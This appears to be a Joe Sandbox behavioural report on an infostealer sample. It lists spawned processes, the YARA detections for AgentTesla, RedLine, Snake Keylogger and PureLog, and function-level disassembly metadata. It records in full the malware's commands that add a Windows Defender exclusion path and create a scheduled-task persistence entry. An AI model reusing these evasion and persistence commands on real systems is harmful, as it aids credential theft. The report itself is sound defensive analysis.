Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\server02.exe, Author: Florian Roth
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	00:41:04
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\Temp\neworigin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\neworigin.exe"
Imagebase:	0xe00000
File size:	250'368 bytes
MD5 hash:	D6A4CF0966D24C1EA836BA9A899751E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000000.1730064175.0000000000E02000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	00:41:06
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0x870000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:41:06
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 00:46 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0xea0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:41:06
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	00:41:06
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	00:41:07
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0x20000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	00:41:07
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp32A9.tmp.cmd""
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	00:41:07
Start date:	28/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	00:41:08
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Imagebase:	0x560000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	00:41:08
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 6
Imagebase:	0xe40000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	00:41:10
Start date:	28/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	00:41:12
Start date:	28/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\surmit.vbs"
Imagebase:	0x7ff7b3a10000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	00:41:13
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\bothsided\surmit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\bothsided\surmit.exe"
Imagebase:	0x400000
File size:	2'267'648 bytes
MD5 hash:	EB8D251C25AB63697FB69A403AF0F09F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000019.00000002.1863278760.0000000004050000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	00:41:16
Start date:	28/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\bothsided\surmit.exe"
Imagebase:	0x490000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	00:41:16
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\bothsided\surmit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\bothsided\surmit.exe"
Imagebase:	0x400000
File size:	2'267'648 bytes
MD5 hash:	EB8D251C25AB63697FB69A403AF0F09F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001C.00000002.1909944306.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	00:41:19
Start date:	28/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\bothsided\surmit.exe"
Imagebase:	0x9b0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001D.00000002.1960895192.0000000003E95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	00:41:21
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Local\Temp\TrojanAI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\TrojanAI.exe"
Imagebase:	0x570000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	00:41:31
Start date:	28/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:	0x9a0000
File size:	231'936 bytes
MD5 hash:	50D015016F20DA0905FD5B37D7834823
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	00:42:56
Start date:	28/11/2024
Path:	C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\fxssvc.exe
Imagebase:	0x140000000
File size:	1'242'624 bytes
MD5 hash:	934580203C0979265F5057C0AFDE93EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	00:42:58
Start date:	28/11/2024
Path:	C:\Windows\System32\msdtc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\msdtc.exe
Imagebase:	0x140000000
File size:	1'278'464 bytes
MD5 hash:	1F7D551740186E4DAF6F854689B6E196
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	00:43:01
Start date:	28/11/2024
Path:	C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Imagebase:	0x140000000
File size:	1'235'968 bytes
MD5 hash:	1117B1EA19B83A43DDF7D75C7D8D4433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	00:43:02
Start date:	28/11/2024
Path:	C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\perfhost.exe
Imagebase:	0x400000
File size:	1'150'976 bytes
MD5 hash:	EDEE2BCBDEFD9AC7870413C713845ED0
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	00:43:04
Start date:	28/11/2024
Path:	C:\Windows\System32\Locator.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\locator.exe
Imagebase:	0x140000000
File size:	1'141'248 bytes
MD5 hash:	86DCD9A8939466521332C54DA596493F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	00:43:06
Start date:	28/11/2024
Path:	C:\Windows\System32\SensorDataService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\SensorDataService.exe
Imagebase:	0x140000000
File size:	1'846'784 bytes
MD5 hash:	5A91E900A0DA58344972F0D6FA4C072C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	00:43:07
Start date:	28/11/2024
Path:	C:\Windows\System32\snmptrap.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\snmptrap.exe
Imagebase:	0x140000000
File size:	1'146'880 bytes
MD5 hash:	19B4E5A78D94F8465DEECD61EC5ACE39
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	00:43:09
Start date:	28/11/2024
Path:	C:\Windows\System32\Spectrum.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\spectrum.exe
Imagebase:	0x140000000
File size:	1'455'616 bytes
MD5 hash:	85CD8E74A449C76731ED7FDB851B5F8D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	5.7%
Signature Coverage:	8%
Total number of Nodes:	2000
Total number of Limit Nodes:	175

Executed Functions

Function 00C0CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 420COMMON

Download Yara Rule

Strings

d, xrefs: 00C0C294
w, xrefs: 00C0C289

Memory Dump Source

Source File: 00000000.00000002.1694228884.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID: d$w
API String ID: 0-2400632791
Opcode ID: 136895d6e4155e74e165fd2d1a4ae592e2cfb7c7fcf19c8192c9f3739d22f89a
Instruction ID: 3ffe15fbb38975dc8033fd249c189b9da40f6d8fa2635e3057f76c4f18118f26
Opcode Fuzzy Hash: 136895d6e4155e74e165fd2d1a4ae592e2cfb7c7fcf19c8192c9f3739d22f89a
Instruction Fuzzy Hash: BCC1223594C340AFDE358768CCC9B7A3A646B61B20F4C4396F676960F3D3259F04E612

Function 0042B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 932d5e09fce22460d026d46474cb082544f819b06526096441e0640c5341d979
Instruction ID: e0f5de3d63888374dd379d58e7dc1cccdf18031ddaac7846d59f909699946da1
Opcode Fuzzy Hash: 932d5e09fce22460d026d46474cb082544f819b06526096441e0640c5341d979
Instruction Fuzzy Hash: F3326175B022288BCB24DF55EC81AEAB7B5FF46314F5440DAE40AE7A81D7349D80CF96

Function 00403D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00403AA3,?), ref: 00403D45
IsDebuggerPresent.KERNEL32(?,?,?,?,00403AA3,?), ref: 00403D57
GetFullPathNameW.KERNEL32(00007FFF,?,?,004C1148,004C1130,?,?,?,?,00403AA3,?), ref: 00403DC8

Part of subcall function 00406430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403DEE,004C1148,?,?,?,?,?,00403AA3,?), ref: 00406471

SetCurrentDirectoryW.KERNEL32(?,?,?,00403AA3,?), ref: 00403E48
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B28F4,00000010), ref: 00471CCE
SetCurrentDirectoryW.KERNEL32(?,004C1148,?,?,?,?,?,00403AA3,?), ref: 00471D06
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0049DAB4,004C1148,?,?,?,?,?,00403AA3,?), ref: 00471D89
ShellExecuteW.SHELL32(00000000,?,?,?,?,00403AA3), ref: 00471D90

Part of subcall function 00403E6E: GetSysColorBrush.USER32(0000000F), ref: 00403E79
Part of subcall function 00403E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00403E88
Part of subcall function 00403E6E: LoadIconW.USER32(00000063), ref: 00403E9E
Part of subcall function 00403E6E: LoadIconW.USER32(000000A4), ref: 00403EB0
Part of subcall function 00403E6E: LoadIconW.USER32(000000A2), ref: 00403EC2
Part of subcall function 00403E6E: RegisterClassExW.USER32(?), ref: 00403F30

Part of subcall function 004036B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 004036E6
Part of subcall function 004036B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403707
Part of subcall function 004036B8: ShowWindow.USER32(00000000), ref: 0040371B
Part of subcall function 004036B8: ShowWindow.USER32(00000000), ref: 00403724

Part of subcall function 00404FFC: _memset.LIBCMT ref: 00405022
Part of subcall function 00404FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004050CB

Strings

runas, xrefs: 00471D84
This is a third-party compiled AutoIt script., xrefs: 00471CC8
()K, xrefs: 00471D49

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: ()K$This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-361992462
Opcode ID: ee406da3e3c865dfb903fead478f857deef8a2dcab3ef7f34a01b537dabb2864
Instruction ID: 8c2ea3201cdb187de0b382d93636e43dc28cc5d5927fe16ad7bbb767c2a6e17f
Opcode Fuzzy Hash: ee406da3e3c865dfb903fead478f857deef8a2dcab3ef7f34a01b537dabb2864
Instruction Fuzzy Hash: 9B51D230E04248AACF11ABB5DC41EEE7B799B0A704F04817FF541762E2CE7C4A458B6D

Function 0041DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?,00000000), ref: 0041DDEC
GetCurrentProcess.KERNEL32(00000000,0049DC38,?,?), ref: 0041DEAC
GetNativeSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0041DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0041DF1F
GetSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF29
GetSystemInfo.KERNEL32(?,0049DC38,?,?), ref: 0041DF35

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 2d397b77c96578f51bd178e611aee99bb28d07d24893a6e8005fdf1bb2615640
Instruction ID: 8d0e3f8703e641f7dc44be798b40e30172c8f454d63aad706eb8f519579aa2d9
Opcode Fuzzy Hash: 2d397b77c96578f51bd178e611aee99bb28d07d24893a6e8005fdf1bb2615640
Instruction Fuzzy Hash: CE61A4B1C0A384DBCF15CF6498C01EA7FB46F29300B1989DAD8495F34BC628C649CB6E

Function 0040406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0040449E,?,?,00000000,00000001), ref: 0040407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0040449E,?,?,00000000,00000001), ref: 00404092
LoadResource.KERNEL32(?,00000000,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB), ref: 00474F1A
SizeofResource.KERNEL32(?,00000000,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB), ref: 00474F2F
LockResource.KERNEL32(0040449E,?,?,0040449E,?,?,00000000,00000001,?,?,?,?,?,?,004041FB,00000000), ref: 00474F42

Strings

SCRIPT, xrefs: 00404088

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 598b74e3e7d0966417a201d7e2a7d5b6959d3e6f169732877d01589aef66d113
Instruction ID: f77eb1c464526354bceaabec8d79980ec563cae601d2e2506ae7cf38a943322b
Opcode Fuzzy Hash: 598b74e3e7d0966417a201d7e2a7d5b6959d3e6f169732877d01589aef66d113
Instruction Fuzzy Hash: 27112E71600701AFE7219B65EC48F677BB9EBC5B51F1045BDF612A62D0DB75DC008A24

Function 00413B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

L, xrefs: 004140EC
L, xrefs: 004140A4
L, xrefs: 0047701F
@, xrefs: 00414176

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$ L$ L$ L
API String ID: 3728558374-1044802042
Opcode ID: c20c292156c628582c5f5d630bd0125284ede2cbf9ef2f8bfb15c20a718d53b1
Instruction ID: 699fc64d503734220e17f3bae4b4584c4c460a180cc37ed444e6cfd760d21436
Opcode Fuzzy Hash: c20c292156c628582c5f5d630bd0125284ede2cbf9ef2f8bfb15c20a718d53b1
Instruction Fuzzy Hash: A4729D74E042049FCF14DF94C481AEEB7B5EF48304F14806BE919AB391D779AE86CB99

Function 00446CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00472F49), ref: 00446CB9
FindFirstFileW.KERNEL32(?,?), ref: 00446CCA
FindClose.KERNEL32(00000000), ref: 00446CDA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 89e679d9f2f1704275dd35e5d452af09cf7d74eba14b971797ddaeb24cd62071
Instruction ID: 78d71e6d327d38dcb7c1aa5d0e34089853346cf5f0f87180683a2751a0062266
Opcode Fuzzy Hash: 89e679d9f2f1704275dd35e5d452af09cf7d74eba14b971797ddaeb24cd62071
Instruction Fuzzy Hash: 2AE0D831C1151057A2146738EC4D8EE376CDE06339F100B1AF871C12D0EB74D90046DF

Function 00413200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

L, xrefs: 0047933E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: BuffCharUpper
String ID: L
API String ID: 3964851224-249544069
Opcode ID: 4310868b2b26861edb084dab6b77cb2c74600d67e3fe464b4a73d06daa09dc81
Instruction ID: 7c9fdd5cd437a79d1c3c0ac98f7823f3fe2e1a6fd868af1480b8a04681f0d1cc
Opcode Fuzzy Hash: 4310868b2b26861edb084dab6b77cb2c74600d67e3fe464b4a73d06daa09dc81
